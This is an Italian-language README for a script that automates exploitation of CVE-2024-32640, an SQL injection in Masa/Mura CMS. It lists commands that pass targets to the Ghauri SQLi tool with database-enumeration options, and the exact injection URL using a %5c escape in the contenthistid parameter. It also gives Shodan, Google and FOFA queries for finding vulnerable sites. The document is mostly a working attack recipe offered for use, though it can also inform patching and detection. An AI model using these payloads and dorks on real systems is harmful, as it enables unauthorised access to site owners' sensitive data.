
CVE-2024-32640 | PoC di sfruttamento SQLi automatizzato
python3 CVE-2024-32640.py --url https://target.com/
Inserisci qualsiasi argomento che desideri utilizzare con Ghauri, seguendo il loro elenco di argomenti:
python3 CVE-2024-32640.py --url https://target.com -g "--dbs --current-db"
python3 CVE-2024-32640.py --url https://target.com --ghauri "--dbs --current-db"

Utilizzando il rilevamento che ho implementato nello strumento, possiamo quindi sfruttare il target vulnerabile con Ghauri. Lo script automatizza questo processo, passando tutte le informazioni necessarie sul target in una chiamata a Ghauri.

Aggiungendo una sequenza di escape (%5c) al valore del parametro HTML Query contenthisid, siamo in grado di verificare se un target è vulnerabile a questa SQLi.
Uno sfruttamento riuscito potrebbe portare ad un accesso non autorizzato a dati sensibili.
URL: https://target.com/_api/json/v1/default/?method=processAsyncObject&object=displayregion&contenthistid=x%5c'&previewID=x
Shodan-query: 'Generator: Masa CMS'
Google: "powered by Mura CMS"
FOFA: app="Mura-CMS"